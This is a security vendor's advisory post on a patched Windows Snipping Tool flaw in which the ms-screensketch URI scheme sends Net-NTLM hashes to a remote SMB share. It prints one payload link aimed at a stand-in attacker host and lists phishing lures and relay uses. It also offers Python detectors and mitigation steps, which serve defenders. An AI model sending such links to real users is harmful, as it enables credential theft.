
PoC released for Windows Snipping Tool vulnerability enabling NTLM hash exposure

A proof-of-concept (PoC) exploit has been publicly released for a vulnerability in Microsoft Windows Snipping Tool that can expose users’ Net-NTLM credential hashes. The issue, tracked as CVE-2026-33829, leverages the application’s handling of a registered URI scheme to trigger outbound authentication without the user’s awareness.

The vulnerability has already been patched by Microsoft as part of the April 2026 security updates, but the availability of a working PoC increases the likelihood of real-world exploitation, particularly in phishing scenarios.

How the attack works

The issue originates from the ms-screensketch URI scheme registered by Snipping Tool. The application accepts a filePath parameter, which can be manipulated to point to a remote SMB share controlled by an attacker instead of a local image.

When a victim interacts with a crafted link, the following sequence occurs:

  • The malicious link triggers the Snipping Tool via a deep link
  • The application attempts to load a remote file over SMB
  • Windows automatically initiates authentication
  • The attacker captures the Net-NTLM hash during the connection

A typical payload looks like:

ms-screensketch:edit?&filePath=\\attacker-server\file.png

No additional execution or malware is required. The authentication attempt alone is enough to expose credentials.
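As an added example (not code from the original post, from Microsoft, or from the researchers it cites), the following Python shows how a defender might parse ms-screensketch: links found in mail, proxy or EDR logs and flag those whose filePath points at a remote UNC share rather than a local file. The scheme and the filePath parameter are taken from the article; the sample links, host names and the handling of percent-encoded and forward-slash path forms are assumptions made for the example so that the check is not tied to one spelling of the path.

```python
import re
from urllib.parse import parse_qs

# Constructed sample links for the example. The first mirrors the payload
# shape quoted in the article; the host names are placeholders, not real
# infrastructure.
SAMPLE_LINKS = [
    r"ms-screensketch:edit?&filePath=\\attacker-server\file.png",
    r"ms-screensketch:edit?filePath=C:\Users\alice\Pictures\shot.png",
    "ms-screensketch:edit?filePath=%5C%5Cexample.test%5Cshare%5Cimg.png",
    "ms-screensketch:edit?filePath=//203.0.113.10/pics/img.png",
    "https://intranet.example/page",
]

# Matches a UNC-style path (\\host\..., \\?\UNC\host\..., or //host/...)
# and captures the host part. Assumed forms, not a list from the advisory.
UNC_RE = re.compile(r"^(?:\\\\\?\\UNC\\|\\\\|//)([^\\/]+)")


def remote_target(link: str):
    """Return the SMB host a ms-screensketch link would contact, or None.

    Only the ms-screensketch scheme is inspected. parse_qs percent-decodes
    the query, so an encoded backslash (%5C) is handled like a literal one,
    and the stray '&' in 'edit?&filePath=' produces no spurious key.
    """
    scheme, sep, rest = link.partition(":")
    if not sep or scheme.lower() != "ms-screensketch":
        return None
    _, _, query = rest.partition("?")
    params = {k.lower(): v for k, v in parse_qs(query).items()}
    for value in params.get("filepath", []):
        m = UNC_RE.match(value.strip())
        if m:
            return m.group(1)
    return None


def scan_links(links):
    """Return (link, host) pairs for every link that would reach a remote share."""
    findings = []
    for link in links:
        host = remote_target(link)
        if host is not None:
            findings.append((link, host))
    return findings


if __name__ == "__main__":
    for link, host in scan_links(SAMPLE_LINKS):
        print(f"remote share target {host!r} in {link}")
```

A local path such as C:\Users\... produces no finding; only paths that would make Windows open an SMB session to another host are reported, which is the condition that triggers the authentication attempt described above.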

Why this matters

This vulnerability stands out because it blends naturally into normal user behavior and trusted system processes.

  • The Snipping Tool opens as expected, creating no suspicion
  • The attack requires minimal user interaction
  • It relies on built-in Windows authentication mechanisms
  • It is highly adaptable to phishing campaigns

Attackers can embed this technique into realistic scenarios such as:

  • HR or internal communication requests
  • document review prompts
  • image editing tasks

In enterprise environments, this makes detection significantly more difficult without visibility into network behavior.

Potential impact

Once captured, Net-NTLM hashes can be used in multiple ways:

  • offline password cracking
  • NTLM relay attacks against internal services
  • lateral movement inside corporate networks
  • privilege escalation in poorly segmented environments

Even without immediate compromise, leaked credentials increase long-term exposure risk.

Patch and mitigation

Microsoft addressed the vulnerability on April 14, 2026. Organizations should ensure all systems are updated.

Recommended actions:

  • Apply the latest Windows security updates
  • Block outbound SMB (TCP port 445) to the internet
  • Monitor for unusual outbound SMB connections
  • Educate users to avoid interacting with unexpected links
  • Review authentication logs for suspicious activity
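The monitoring items above reduce to one concrete network-side check: any outbound connection to TCP 445 whose destination lies outside the organisation's own address ranges. The Python below is an added example, not part of the original article or of any DIAMATIX tooling; the event lines, hostnames, timestamps and process names are constructed, the internal ranges are assumed to be RFC 1918 plus loopback and link-local, and the 203.0.113.0/24 and 198.51.100.0/24 documentation ranges stand in for public internet addresses.

```python
import ipaddress

# Constructed sample connection events in a simplified CSV shape
# (timestamp, host, initiating process, destination IP, destination port).
# Hostnames, process names and timestamps are invented for the example;
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges standing in
# for public internet addresses.
SAMPLE_EVENTS = """\
2026-04-15T09:12:01Z,WS-0142,outlook.exe,10.20.30.5,443
2026-04-15T09:12:07Z,WS-0142,snippingtool.exe,203.0.113.25,445
2026-04-15T09:12:09Z,WS-0142,explorer.exe,10.20.30.40,445
2026-04-15T09:13:44Z,WS-0201,svchost.exe,198.51.100.7,445
2026-04-15T09:14:02Z,WS-0201,chrome.exe,198.51.100.7,443
"""

# Assumed organisation-internal ranges: RFC 1918 plus loopback and link-local.
# A real deployment would substitute its own address plan.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
              "127.0.0.0/8", "169.254.0.0/16")
]

SMB_PORTS = {445}


def is_internal(ip_text: str) -> bool:
    """True if the address falls inside one of the assumed internal ranges."""
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETS)


def find_external_smb(events: str):
    """Return every event that is an SMB connection leaving the internal ranges.

    This is the network-side check behind 'monitor for unusual outbound SMB':
    the destination port is SMB and the destination is not an internal address.
    Internal file-server traffic on 445 (the explorer.exe line) is not flagged.
    """
    hits = []
    for line in events.splitlines():
        if not line.strip():
            continue
        ts, host, image, dst, port = (f.strip() for f in line.split(","))
        if int(port) in SMB_PORTS and not is_internal(dst):
            hits.append({"time": ts, "host": host, "image": image,
                         "dst": dst, "port": int(port)})
    return hits


def summarize(hits):
    """Group hits by endpoint so a responder sees which machines attempted the connection."""
    by_host = {}
    for h in hits:
        by_host.setdefault(h["host"], []).append(h["dst"])
    return by_host


if __name__ == "__main__":
    hits = find_external_smb(SAMPLE_EVENTS)
    for h in hits:
        print(f'{h["time"]} {h["host"]} {h["image"]} -> {h["dst"]}:{h["port"]} external SMB')
    print(summarize(hits))
```

Each hit is a candidate credential exposure regardless of which process initiated it; the initiating process and timestamp are kept so the event can be correlated with endpoint telemetry and with the authentication logs mentioned above.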

DIAMATIX perspective

This case highlights a recurring pattern. Attacks increasingly rely on legitimate system behavior, not traditional malware.

The exploitation chain here is simple, but effective:

  • trusted application
  • expected user interaction
  • silent credential exposure

Without continuous monitoring, this activity blends into normal operations.

At DIAMATIX, we see this as a visibility challenge rather than a purely technical vulnerability. Detecting such activity requires:

  • correlation of endpoint and network signals
  • monitoring authentication flows
  • identifying abnormal outbound behavior

Security is no longer only about blocking execution. It is about understanding what “normal” looks like and reacting when it subtly changes.

Sources

  • Microsoft Security Updates – April 2026 Patch Tuesday
  • Black Arrow Security – vulnerability research and PoC disclosure
  • Publicly available technical analysis and security advisories
